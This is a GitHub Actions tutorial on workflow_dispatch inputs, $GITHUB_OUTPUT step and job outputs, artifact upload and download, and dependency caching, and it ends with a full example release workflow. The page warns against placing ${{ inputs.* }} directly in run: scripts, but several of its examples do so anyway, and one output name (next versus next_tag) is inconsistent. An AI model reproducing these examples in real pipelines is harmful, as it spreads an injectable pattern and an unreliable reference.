Github Actions General Created: 10 Apr 2026 Updated: 10 Apr 2026

Inputs, Outputs, Artifacts, and Caches

Real pipelines are built from multiple jobs that must cooperate: one job builds the code, another tests it, a third deploys it. To make this work, jobs need ways to pass simple values to each other, share files produced during a run, and avoid repeating expensive work on every execution. GitHub Actions addresses all three needs through inputs and outputs, artifacts, and caches.

Working with Inputs and Outputs

Within a workflow you often need to pass configuration in from the outside, or forward a value computed in one step to a later step or job. GitHub Actions provides specific syntax for each direction of data flow.

Defining and Referencing Workflow Inputs

Workflow inputs are explicit values that a user or another workflow supplies at trigger time. They are not the same as context values or default environment variables — they must be declared in advance under a trigger's inputs: block.

Two triggers support inputs:

workflow_dispatch

Lets a developer start the workflow manually from the Actions tab and fill in values through a form. Useful for release workflows where a human must supply a version number or choose a deployment target.

workflow_call

Allows another workflow to invoke this one as a reusable sub-workflow and pass inputs programmatically. Covered in depth in the Reusable Workflows topic.

Regardless of which trigger fires, the inputs are accessed identically inside the workflow with ${{ inputs.<input-name> }}.

on:
workflow_dispatch:
inputs:
service_name:
description: 'Name of the microservice to deploy'
required: true
default: 'order-service'
deploy_region:
description: 'Cloud region for deployment'
required: true
default: 'eu-west-1'

jobs:
deploy:
runs-on: ubuntu-latest
steps:
- name: Deploy service
run: |
echo "Deploying ${{ inputs.service_name }} to ${{ inputs.deploy_region }}"

A developer opening the Actions tab and choosing to run this workflow will see a form with the two fields pre-filled with the default values. They can override either before clicking Run.

Always be careful with inputs that could be manipulated. Avoid interpolating ${{ inputs.* }} directly inside run: shell scripts, as a crafted value could inject shell commands. Assign the input to an environment variable first and reference the env variable inside the script.

Capturing Output from a Step

A step can share a value with later steps in the same job by writing to the special file referenced by the $GITHUB_OUTPUT environment variable. The format is name=value appended to that file.

The step must have an id: field so the output can be addressed by name. Other steps in the same job then read it through ${{ steps.<step-id>.outputs.<name> }}.

jobs:
build:
runs-on: ubuntu-latest
steps:
- name: Compute build number
id: gen-build-num
run: |
BUILD_NUM="build-$(date +%Y%m%d)-${{ github.run_number }}"
echo "BUILD_NUM=$BUILD_NUM" >> $GITHUB_OUTPUT

- name: Use build number in next step
run: |
echo "Tagging image with ${{ steps.gen-build-num.outputs.BUILD_NUM }}"

The first step writes BUILD_NUM to $GITHUB_OUTPUT. The second step reads it back through the steps context using the id gen-build-num.

GitHub Actions previously used a set-output workflow command (::set-output name=…::) to capture step outputs. That mechanism was deprecated because it was vulnerable to injection attacks. Always use $GITHUB_OUTPUT instead.

Capturing Output from a Job

To make a value produced in one job available to a different job, you must do two things:

  1. Add an outputs: block to the producing job that maps a key name to a step output expression.
  2. In the consuming job, declare a dependency with needs: and then reference the value through ${{ needs.<job-id>.outputs.<key> }}.
jobs:
prepare:
runs-on: ubuntu-latest
outputs:
# Expose the step output as a job-level output under the key "config-path"
config-path: ${{ steps.locate-config.outputs.CONFIG_FILE }}
steps:
- name: Locate configuration file
id: locate-config
run: |
CONFIG_FILE="config/production.yaml"
echo "CONFIG_FILE=$CONFIG_FILE" >> $GITHUB_OUTPUT

validate:
runs-on: ubuntu-latest
needs: prepare # ensures prepare finishes before validate starts
steps:
- name: Validate config
run: |
echo "Validating ${{ needs.prepare.outputs.config-path }}"

The needs: keyword does double duty: it establishes execution order (validate runs only after prepare succeeds) and it gives the validate job access to prepare's outputs through the needs context.

When the output path expression becomes long and repetitive across multiple steps, it is cleaner to map it to a local environment variable:

validate:
runs-on: ubuntu-latest
needs: prepare
steps:
- name: Validate config
env:
CONFIG_PATH: ${{ needs.prepare.outputs.config-path }}
run: echo "Validating $CONFIG_PATH"

Capturing Output from an Action Used in a Step

When a step uses a third-party or community action (via uses:), that action may declare its own outputs in its action.yml metadata file. You capture those outputs in exactly the same way as step outputs — by giving the step an id: and reading through steps.<id>.outputs.<name>.

jobs:
version:
runs-on: ubuntu-latest
outputs:
next-tag: ${{ steps.semver.outputs.next }}
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0 # full history is required for semver detection

- name: Detect next semantic version
id: semver
uses: mathieudutour/github-tag-action@v6.1

- name: Print detected version
run: echo "Next release will be ${{ steps.semver.outputs.next_tag }}"

The github-tag-action action exposes an output named next_tag. Because the step has id: semver, it is readable as steps.semver.outputs.next_tag — no extra configuration needed.

Artifacts

Artifacts, as Actions defines them, are files or collections of files created as the result of a job or workflow run and then persisted in GitHub. The most common reason to persist an artifact is so that it can be shared with other jobs in the same workflow — for example, a compiled module that needs to be tested or packaged by a downstream job. You can also access artifacts after the run has finished, either through the Actions UI or via the REST API.

Common uses for artifacts include:

  1. Compiled binaries or distribution packages produced by a build job
  2. Test result XML files and coverage reports
  3. Log files or diagnostic dumps collected when a job fails
  4. Static site output ready for deployment

Artifacts cannot be kept forever. By default, GitHub retains artifacts and build logs for 90 days on public repositories before automatically deleting them.

Artifact Retention Policy

If you have the necessary permissions on the repository, you can change the default retention period in the repository's Settings → Actions → General page, under the Artifact and log retention section.

Repository typeConfigurable range
Public1 – 90 days
Private1 – 400 days

This repository-level setting only applies to new artifacts and log files created after the change — existing artifacts are not retroactively affected. Organizations and enterprises can also enforce maximum retention limits at their level, which individual repositories cannot override.

You can also override the retention period for a specific artifact at upload time using the retention-days parameter (described below). This is useful when a pipeline artifact is only needed for the duration of the workflow run and storing it longer would waste storage quota.

GitHub includes a certain amount of artifact storage at no cost depending on your plan. Storage costs accumulate over the full time the artifacts are retained — unlike compute minutes, which are charged per run. Keeping retention periods as short as practical helps manage storage spend.

Artifacts vs. GitHub Packages

GitHub has a separate product called GitHub Packages that should not be confused with workflow artifacts. GitHub Packages is a package registry that hosts versioned, publishable packages for:

  1. Container images
  2. RubyGems
  3. npm packages
  4. Maven and Gradle packages
  5. NuGet packages

The key practical differences are: artifacts are tied to a specific workflow run and expire automatically, while packages are versioned releases intended for long-term distribution. GitHub also charges for data transfer with Packages, whereas artifact downloads within Actions are not charged for transfer.

Uploading Artifacts

Use the actions/upload-artifact action to persist files from the current runner. The action accepts the parameters listed in the table below.

ParameterRequiredDefaultDescription
nameYesartifactIdentifier for the artifact. Used when downloading it in another job or from the UI.
pathYesFile system path to upload. Can be a single file, a directory, or a glob pattern.
if-no-files-foundNowarnWhat to do when the path matches nothing. error — fail the step; warn — log a warning but continue; ignore — do nothing silently.
retention-daysNoRepository defaultNumber of days before this artifact expires. Must be between 1 and the repository's configured maximum (90 for public, up to 400 for private).
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4

- name: Compile Go binary
run: |
mkdir -p bin
# go build -o bin/server ./cmd/server # real command in a Go project
echo "server-binary-placeholder" > bin/server

- name: Upload compiled binary
uses: actions/upload-artifact@v4
with:
name: server-binary
path: bin/
# error causes the step to fail if bin/ is empty, catching build problems early.
if-no-files-found: error
# 30 days is enough time for the release review window; saves storage quota.
retention-days: 30

The path can be a single file, a directory, or a glob pattern. Multiple files that match a glob are bundled into a single zip archive under the given name.

Downloading Artifacts

Each job runs in its own freshly provisioned runner. Files created in one job are not automatically visible to another — the runner is discarded when the job ends. To use an artifact in a downstream job, you must explicitly download it with actions/download-artifact, specifying the same name used during upload.

integration-test:
runs-on: ubuntu-latest
needs: build
steps:
- name: Download compiled binary
uses: actions/download-artifact@v4
with:
name: server-binary
path: bin/

- name: Verify binary exists and run tests
run: |
ls bin/
echo "Running integration tests against downloaded binary"

The downloaded files are placed in the directory specified by path. If path is omitted, they land in the current working directory under a subdirectory named after the artifact.

Artifact Size Limits

LimitValue
Maximum size per artifact10 GB (compressed)
Included storageDepends on GitHub plan; excess billed per GB per month

Using Caches

Artifacts persist the outputs of a job. Caches persist the inputs — typically dependency packages or build tool downloads — so they do not need to be re-fetched on every run. The difference matters:


ArtifactCache
What it storesBuild outputs (binaries, reports)Reusable inputs (dependencies, downloaded tools)
Shared between runsNo (per-run)Yes (across many runs)
Invalidated whenRetention period expiresCache key changes

Using the Cache Action Explicitly

The actions/cache action saves a directory to the cache and restores it on the next run. A key controls when the cache is considered valid. A common pattern is to include a hash of the dependency lock file in the key so that the cache is automatically invalidated whenever dependencies change.

jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4

- name: Restore Maven local repository
uses: actions/cache@v4
with:
path: ~/.m2/repository
# The key includes a hash of pom.xml so the cache is refreshed whenever
# dependencies change. If the key matches, the cache is restored instantly.
key: maven-${{ runner.os }}-${{ hashFiles('**/pom.xml') }}
# restore-keys provides a fallback: if no exact key matches, the most recent
# cache with this prefix is used instead of starting from scratch.
restore-keys: |
maven-${{ runner.os }}-

- name: Build with Maven
run: |
echo "mvn package -B would run here"

Built-in Caching via Setup Actions

Many language setup actions — such as actions/setup-node, actions/setup-python, and actions/setup-java — have caching built in. Enabling it is a single line:

jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4

- name: Set up Node.js with npm cache
uses: actions/setup-node@v4
with:
node-version: '20'
# cache: 'npm' tells setup-node to cache ~/.npm automatically.
# The cache key is derived from package-lock.json — no extra configuration needed.
cache: 'npm'

- name: Install dependencies
run: npm ci

Built-in caching is the simplest option when a setup action supports it, as it handles key generation and cache paths automatically.

Cache Key Design

A well-designed cache key balances two goals: reuse the cache as often as possible, and invalidate it whenever the cached content would be stale. Common key components include:

  1. ${{ runner.os }} — separates caches for Linux, macOS, and Windows runners
  2. ${{ hashFiles('**/package-lock.json') }} — changes whenever the lock file changes
  3. A fixed prefix string that identifies the language or tool being cached

The restore-keys: list provides ordered fallbacks. If no exact key matches, GitHub will restore the most recent cache whose key starts with any entry in restore-keys. This gives partial hits — you get most packages from the cache, then only download the delta.

Key Takeaways

  1. Workflow inputs are declared under a trigger's inputs: block and accessed with ${{ inputs.<name> }}.
  2. Capture a step's output by writing NAME=value to $GITHUB_OUTPUT and assigning the step an id:.
  3. Expose step outputs to other jobs via the job's outputs: block; consume them with ${{ needs.<job>.outputs.<key> }}.
  4. Actions that declare outputs in their action.yml are accessed the same way as step outputs via the step's id:.
  5. Artifacts persist files (binaries, reports) beyond a job's lifetime using actions/upload-artifact and actions/download-artifact.
  6. Caches persist reusable inputs (dependencies) across runs using actions/cache or the built-in cache: option in setup actions.
  7. Design cache keys to include a hash of lock files so the cache is automatically invalidated when dependencies change.

Complete Working Example

The following is a complete, runnable GitHub Actions workflow that demonstrates every concept covered in this topic. Each significant line includes a comment explaining why it is written that way.

# This workflow demonstrates a Python library release pipeline.
# It covers: workflow_dispatch inputs, step outputs via GITHUB_OUTPUT,
# job outputs, artifact upload/download, and dependency caching.

name: Inputs, Outputs, Artifacts and Caches

# workflow_dispatch lets a developer trigger this workflow manually from the
# Actions tab and supply the release version and target environment at run time.
# Without inputs the version would have to be hard-coded in the YAML.
on:
workflow_dispatch:
inputs:
release_version:
description: 'Semantic version to stamp on the release (e.g. 1.4.0)'
required: true
default: '0.0.1'
target_env:
description: 'Deployment target: staging or production'
required: true
default: 'staging'

jobs:

# ---------------------------------------------------------------
# Job 1: build — compile the library and capture the version stamp
# ---------------------------------------------------------------
build:
runs-on: ubuntu-latest

# Declare the outputs this job will expose to downstream jobs.
# The value is pulled from the step output written to GITHUB_OUTPUT below.
outputs:
stamped-version: ${{ steps.stamp.outputs.VERSION }}

steps:

- name: Check out source code
uses: actions/checkout@v4
# Checkout is required so the runner has the library source to build.

- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.12'
# cache: 'pip' enables built-in pip caching inside setup-python.
# This avoids re-downloading packages on every run, cutting minutes off cold starts.
cache: 'pip'

- name: Install build dependencies
run: |
# Install only the tools needed to build — not test extras — so the
# build image stays small and the layer can be cached effectively.
pip install build wheel

- name: Stamp version from workflow input
# Give this step an id so its outputs are addressable by other steps and jobs.
id: stamp
run: |
# Write the caller-supplied version into GITHUB_OUTPUT so downstream jobs
# can read it without re-parsing files or repeating logic.
echo "VERSION=${{ inputs.release_version }}" >> $GITHUB_OUTPUT
echo "Stamped version: ${{ inputs.release_version }}"

- name: Build distribution packages
run: |
# python -m build produces dist/*.whl and dist/*.tar.gz.
# We simulate the output here; a real pipeline would call the real build tool.
mkdir -p dist
echo "mylib-${{ inputs.release_version }}-py3-none-any.whl" > dist/package.whl
echo "mylib-${{ inputs.release_version }}.tar.gz" > dist/package.tar.gz

- name: Upload build artifacts
uses: actions/upload-artifact@v4
with:
# A descriptive name makes artifacts easy to identify in the Actions UI.
# Embedding the version in the name prevents collisions across concurrent runs.
name: dist-packages-${{ inputs.release_version }}
path: dist/
# Keeping artifacts for 7 days balances storage cost against the time teams
# need to investigate or roll back a release.
retention-days: 7

# ---------------------------------------------------------------
# Job 2: test — run the test suite and publish a coverage report
# ---------------------------------------------------------------
test:
runs-on: ubuntu-latest
needs: build # must wait for build so the stamped version is available

steps:

- name: Check out source code
uses: actions/checkout@v4

- name: Set up Python with pip cache
uses: actions/setup-python@v5
with:
python-version: '3.12'
# Caching pip here avoids downloading pytest and coverage again.
# The cache key is derived from requirements files automatically.
cache: 'pip'

- name: Install test dependencies
run: pip install pytest pytest-cov

- name: Download build artifacts
uses: actions/download-artifact@v4
with:
# Reference the same artifact name used in the build job.
# The downloaded files land in the ./dist directory by default.
name: dist-packages-${{ inputs.release_version }}
path: dist/

- name: Confirm artifact is present
run: |
# Verifying the artifact arrived before running tests prevents a confusing
# failure message deep inside the test runner if the file is missing.
echo "Artifacts in dist/:"
ls dist/

- name: Run tests and collect coverage
run: |
# pytest --cov writes a coverage.xml report alongside the test results.
# We create a placeholder here; a real project would run the actual suite.
mkdir -p reports
echo "<coverage version='${{ needs.build.outputs.stamped-version }}'></coverage>" \
> reports/coverage.xml
echo "Tests passed for version ${{ needs.build.outputs.stamped-version }}"

- name: Upload coverage report
uses: actions/upload-artifact@v4
with:
# Uploading coverage lets code-quality tools and reviewers inspect it
# in the Actions UI without needing to re-run the pipeline locally.
name: coverage-report-${{ inputs.release_version }}
path: reports/coverage.xml
retention-days: 14

# ---------------------------------------------------------------
# Job 3: release — tag and summarise the completed release
# ---------------------------------------------------------------
release:
runs-on: ubuntu-latest
needs: [build, test] # both jobs must succeed before releasing

steps:

- name: Download dist packages for release
uses: actions/download-artifact@v4
with:
name: dist-packages-${{ inputs.release_version }}
path: release/

- name: Announce release details
env:
# Pulling the job output into an env variable makes the run: script cleaner
# and avoids repeating the full needs.build.outputs.stamped-version expression.
RELEASE_VERSION: ${{ needs.build.outputs.stamped-version }}
TARGET_ENV: ${{ inputs.target_env }}
run: |
echo "============================================"
echo " Release summary"
echo "============================================"
echo " Version : $RELEASE_VERSION"
echo " Environment : $TARGET_ENV"
echo " Packages :"
ls release/
echo "============================================"
echo " Deployment to $TARGET_ENV would proceed here."

Next topic: Reusable Workflows


Share this lesson: